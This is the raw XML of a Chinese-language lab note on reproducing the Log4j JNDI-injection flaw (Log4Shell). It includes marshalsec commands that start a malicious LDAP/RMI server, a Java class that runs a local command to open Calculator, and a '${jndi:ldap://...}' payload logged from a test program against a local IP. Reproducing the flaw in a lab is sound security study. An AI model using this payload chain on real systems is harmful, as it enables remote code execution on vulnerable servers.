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F28E" w14:textId="52D3C664" w:rsidR="00B257B4" w:rsidRDefault="003F7CDF">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr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rce</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>代码原理</w:t>
      </w:r>
      <w:r w:rsidR="003E7CFD">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（JNDI注入）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73FA2809" w14:textId="77777777" w:rsidR="009D4998" w:rsidRPr="009D4998" w:rsidRDefault="009D4998" w:rsidP="009D4998">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">影响版本 </w:t>
      </w:r>
      <w:r w:rsidRPr="009D4998">
        <w:t>Apache Log4j 2.x &lt;= 2.15.0-rc1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59AEFD0C" w14:textId="24E78E73" w:rsidR="009D4998" w:rsidRDefault="009D4998">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5AA8CF7B" w14:textId="31B6CC87" w:rsidR="003F7CDF" w:rsidRDefault="001C6982">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>复现</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F7E6E5B" w14:textId="407F78C0" w:rsidR="009D4998" w:rsidRDefault="009D4998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dap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="007C2451">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：目录访问协议</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36951C13" w14:textId="2276BEBC" w:rsidR="009D4998" w:rsidRDefault="009D4998">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>R</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>mi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="007C2451">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：远程通信协议</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30697EBA" w14:textId="486AE381" w:rsidR="00597394" w:rsidRDefault="00597394">
      <w:r>
        <w:t>Java -cp</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>是指定</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>cla</w:t>
      </w:r>
      <w:r>
        <w:t>ss</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>path</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="045C808A" w14:textId="649E7E07" w:rsidR="00597394" w:rsidRDefault="00597394">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Marshalsec</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>反序列化利用工具</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="326E0B87" w14:textId="77777777" w:rsidR="003E7CFD" w:rsidRDefault="003E7CFD"/>
    <w:p w14:paraId="74B2B3E3" w14:textId="77777777" w:rsidR="00597394" w:rsidRDefault="00597394">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2A569224" w14:textId="422F6F27" w:rsidR="00597394" w:rsidRDefault="00597394">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>开启LDAP服务</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="114CE125" w14:textId="768B9C19" w:rsidR="00597394" w:rsidRDefault="00597394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38</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="4D4D4D"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">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LDAP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08C24F3D" w14:textId="746BB1B2" w:rsidR="00597394" w:rsidRDefault="00597394">
      <w:r w:rsidRPr="00597394">
        <w:t xml:space="preserve">java -cp target/marshalsec-0.0.3-SNAPSHOT-all.jar </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00597394">
        <w:t>marshalsec.jndi</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00597394">
        <w:t>.LDAPRefServer</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00597394">
        <w:t xml:space="preserve"> http://127.0.0.1/css/#ExportObject 1389</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55158E80" w14:textId="77777777" w:rsidR="00597394" w:rsidRDefault="00597394">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="09566652" w14:textId="607E3405" w:rsidR="00597394" w:rsidRDefault="00597394">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">开启RMI服务 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FEE440B" w14:textId="16185E77" w:rsidR="001C6982" w:rsidRDefault="00597394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1099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RMI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7A18E8FD" w14:textId="06D7FD09" w:rsidR="001C6982" w:rsidRDefault="00597394">
      <w:r w:rsidRPr="00597394">
        <w:t xml:space="preserve">java -cp target/marshalsec-0.0.3-SNAPSHOT-all.jar </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00597394">
        <w:t>marshalsec.jndi</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00597394">
        <w:t>.LDAPRefServer</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00597394">
        <w:t xml:space="preserve"> http://127.0.0.1/css/#ExportObject 1389</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DA4E1CE" w14:textId="77777777" w:rsidR="00BB258A" w:rsidRDefault="00BB258A"/>
    <w:p w14:paraId="2934A537" w14:textId="77777777" w:rsidR="00BB258A" w:rsidRDefault="00BB258A"/>
    <w:p w14:paraId="621F033B" w14:textId="0775566E" w:rsidR="00BB258A" w:rsidRDefault="00BB258A">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>开启本地python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</w:p>
    <w:p w14:paraId="7191F95D" w14:textId="6AD8503A" w:rsidR="00BB258A" w:rsidRDefault="00BB258A">
      <w:r w:rsidRPr="00BB258A">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="078AB9DC" wp14:editId="67F1B90E">
            <wp:extent cx="5274310" cy="832485"/>
            <wp:effectExtent l="0" t="0" r="0" b="5715"/>
            <wp:docPr id="555642743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2743" name="图片 1" descr="图片包含 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932" w14:textId="5EBAB0B8" w:rsidR="00BB258A" w:rsidRDefault="00BB258A">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>开启LDAP服务</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CF53C28" w14:textId="3AC5E261" w:rsidR="00BB258A" w:rsidRDefault="00BB258A">
      <w:r w:rsidRPr="00BB258A">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="548A7941" wp14:editId="182C9036">
            <wp:extent cx="5274310" cy="796925"/>
            <wp:effectExtent l="0" t="0" r="0" b="3175"/>
            <wp:docPr id="19065813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136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752" w14:textId="06CB24D7" w:rsidR="00BB258A" w:rsidRDefault="00BB258A">
      <w:pPr>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB258A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>开启</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00BB258A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>ldap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00BB258A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>服务 通过访问</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00BB258A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>ldap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00BB258A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve">服务跳转去访问攻击者的恶意代码 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="192DD875" w14:textId="2546E288" w:rsidR="00BB258A" w:rsidRDefault="00BB258A">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB258A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>要</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>在class的目录下通过</w:t>
      </w:r>
      <w:r w:rsidR="0015119D" w:rsidRPr="0015119D">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve">python -m </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="0015119D" w:rsidRPr="0015119D">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>SimpleHTTPServer</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="0015119D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>（python</w:t>
      </w:r>
      <w:r w:rsidR="0015119D">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidR="0015119D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>）启动server服务 才能访问到该恶意代码 不然会4</w:t>
      </w:r>
      <w:r w:rsidR="0015119D">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>04</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B4F905D" w14:textId="77777777" w:rsidR="0015119D" w:rsidRDefault="0015119D">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4CFB21C0" w14:textId="1EC4C2D6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攻击者的恶意代码 弹出计算器</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32C42AF3" w14:textId="77777777" w:rsidR="0015119D" w:rsidRPr="0015119D" w:rsidRDefault="0015119D" w:rsidP="0015119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8AFBE"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pP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class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</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0015119D">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:color w:val="8EC1FF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 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执行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RCE"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String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"open"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,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"/System/Applications/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0015119D">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:color w:val="75AA5F"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Calculator.app</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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try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lastRenderedPageBreak/>
        <w:t xml:space="preserve">    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Process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exec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Runtime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A8AFBE"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>getRuntime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.exec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proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0015119D">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:color w:val="C66D5E"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>exec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.waitFor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完成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}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catch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Exception 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throw new </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0015119D">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:color w:val="A8AFBE"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>RuntimeException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static void </w:t>
      </w:r>
      <w:r w:rsidRPr="0015119D">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:color w:val="8EC1FF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>main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String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proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0015119D">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:color w:val="C675B9"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>args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 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0015119D">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:color w:val="C66D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new </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0015119D">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:color w:val="A8AFB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>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F75DDDE" w14:textId="77777777" w:rsidR="0015119D" w:rsidRDefault="0015119D">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4E29C104" w14:textId="217A7FE2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测试代码</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EE00A1D" w14:textId="77777777" w:rsidR="0015119D" w:rsidRDefault="0015119D" w:rsidP="0015119D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import </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="C6C45E"/>
        </w:rPr>
        <w:t>org.apache</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="C6C45E"/>
        </w:rPr>
        <w:t>.logging.log4j.LogManager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r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="C6C45E"/>
        </w:rPr>
        <w:t>org.apache.logging.log4j.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="C6A02F"/>
        </w:rPr>
        <w:t>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LogTest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final </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="C6A02F"/>
        </w:rPr>
        <w:t xml:space="preserve">Logger </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="9876AA"/>
        </w:rPr>
        <w:t>logger</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="9876AA"/>
        </w:rPr>
        <w:t xml:space="preserve"> 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45E"/>
        </w:rPr>
        <w:t>LogManager</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="A8AFBE"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="A8AFBE"/>
        </w:rPr>
        <w:t>getLogger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A8AFBE"/>
        </w:rPr>
        <w:t>setProperty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</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:color w:val="75AA5F"/>
        </w:rPr>
        <w:t>com.sun.jndi.ldap.object.trustURLCodebase</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:color w:val="75AA5F"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="CC7832"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="75AA5F"/>
        </w:rPr>
        <w:t>"true"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logger</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="A8AFBE"/>
        </w:rPr>
        <w:t>.error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"${</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:color w:val="75AA5F"/>
        </w:rPr>
        <w:t>jndi:ldap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:color w:val="75AA5F"/>
        </w:rPr>
        <w:t>://192.168.1.6:1389/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:color w:val="75AA5F"/>
        </w:rPr>
        <w:t>BugFinder</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:color w:val="75AA5F"/>
        </w:rPr>
        <w:t>}"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6338E440" w14:textId="77777777" w:rsidR="0015119D" w:rsidRDefault="0015119D">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6EA93820" w14:textId="5C66694B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这里的</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr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地址是本地Ip</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>:1389</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07BD0BEC" w14:textId="68CFAFC8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389</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>是</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/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默认的端口</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06C9D78B" w14:textId="7943535D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通过访问</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/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服务 然后跳转到本机python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server的恶意代码</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="494868DD" w14:textId="256B70D9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注意点：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74064EB0" w14:textId="43FF943E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proofErr w:type="spellStart"/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dap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>服务需要开启（使用</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>marshasec</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>去开启） 而去需要注意这里恶意代码的存放位置 否则会4</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve">04 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11A0884A" w14:textId="7C7CE861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（2）python的server是在class文件底下去开启 否则会server里就没有恶意代码的文件 访问的时候就会出现4</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>04</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14D21034" w14:textId="77777777" w:rsidR="0015119D" w:rsidRDefault="0015119D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4510FE6E" w14:textId="313B49E6" w:rsidR="0015119D" w:rsidRDefault="0015119D">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0015119D">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4A8ED618" wp14:editId="64B832E1">
            <wp:extent cx="2667000" cy="1981200"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1064965752" name="图片 1" descr="图形用户界面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5752" name="图片 1" descr="图形用户界面, 日程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2C3" w14:textId="55821511" w:rsidR="0015119D" w:rsidRPr="0015119D" w:rsidRDefault="001511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没有存放在某个包下</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37A8E8B7" w14:textId="77777777" w:rsidR="0015119D" w:rsidRPr="0015119D" w:rsidRDefault="0015119D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0A5319C3" w14:textId="30F85941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复现效果</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="006A3013" w14:textId="1FF39F66" w:rsidR="0015119D" w:rsidRPr="00BB258A" w:rsidRDefault="0015119D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0015119D">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6036D196" wp14:editId="668124A8">
            <wp:extent cx="5274310" cy="3474720"/>
            <wp:effectExtent l="0" t="0" r="0" b="5080"/>
            <wp:docPr id="72828366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83664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147" w14:textId="77777777" w:rsidR="00913734" w:rsidRDefault="00913734"/>
    <w:p w14:paraId="2EFE8C00" w14:textId="67623DE2" w:rsidR="00913734" w:rsidRDefault="00913734">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>还可以通过构造</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>rmi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>远程访问</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="241625D7" w14:textId="751E82C7" w:rsidR="00913734" w:rsidRDefault="00913734">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>或者使用</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>dnslog</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> curl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url</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="4CAE828F" w14:textId="77777777" w:rsidR="00913734" w:rsidRDefault="00913734">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="64087585" w14:textId="76D39B6D" w:rsidR="001C6982" w:rsidRDefault="001C6982">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>漏洞源码：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D8B7B75" w14:textId="3368AE4D" w:rsidR="001C6982" w:rsidRDefault="00913734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>默认支持</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ldap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>\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协议</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F342031" w14:textId="6591320C" w:rsidR="00913734" w:rsidRDefault="00913734">
      <w:r>
        <w:t>L</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ookup接口直接将用户传来的数据解析执行</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EF73807" w14:textId="77777777" w:rsidR="00913734" w:rsidRDefault="00913734">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5986AEC3" w14:textId="77777777" w:rsidR="0015119D" w:rsidRDefault="0015119D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="0015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DF"/>
    <w:rsid w:val="0015119D"/>
    <w:rsid w:val="001C6982"/>
    <w:rsid w:val="003E7CFD"/>
    <w:rsid w:val="003F7CDF"/>
    <w:rsid w:val="00597394"/>
    <w:rsid w:val="005A1CB5"/>
    <w:rsid w:val="007C2451"/>
    <w:rsid w:val="008B738E"/>
    <w:rsid w:val="00913734"/>
    <w:rsid w:val="009D4998"/>
    <w:rsid w:val="00B257B4"/>
    <w:rsid w:val="00BB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4B84"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{A6715943-33CC-9646-AC78-9063E0E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119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3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62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3</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2023-04-08T12:05:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-04-09T07:03:00Z</dcterms:modified>
</cp:coreProperties>
</file>